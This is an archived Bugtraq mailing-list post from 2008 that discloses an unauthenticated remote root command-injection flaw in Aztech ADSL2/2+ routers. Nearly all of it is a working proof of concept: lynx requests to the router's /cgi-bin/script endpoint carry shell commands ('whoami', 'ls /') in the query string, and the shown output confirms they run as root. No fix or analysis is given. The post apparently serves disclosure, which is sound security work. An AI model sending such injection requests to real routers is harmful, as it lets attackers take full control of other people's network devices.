Aztech ADSL2/2+ 4 Port remote root

---

• From: sipherr@xxxxxxxxx
• Date: 26 Mar 2008 00:08:49 -0000

---

(http://www.aztech.com)

# cat versions
VERSION=3.7.0
BUILD=070426
BOARD=AR7RD
FSSTAMP=20070426171252


Example:

$ lynx "http://192.168.0.5/cgi-bin/script?system%20&%20whoami"; --source
root
$ lynx "http://192.168.0.5/cgi-bin/script?system%20&%20ls /" --source
bin
dev
etc
lib
proc
sbin
usr
var
var.tar
$


http://core.ifconfig.se/~core/

---

• Prev by Date: [security bulletin] HPSBTU02322 SSRT080011 rev.1 - HP Tru64 UNIX running SSH/SFTP Server, Remote Execution of Arbitrary Code or Denial of Service (DoS)
• Next by Date: Re: hacking the mitsubishi GB-50A
• Previous by thread: [security bulletin] HPSBTU02322 SSRT080011 rev.1 - HP Tru64 UNIX running SSH/SFTP Server, Remote Execution of Arbitrary Code or Denial of Service (DoS)
• Next by thread: php-addressbook v2.0 SQL Injection Vulnerbility
• Index(es):
  • Date
  • Thread

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2008-03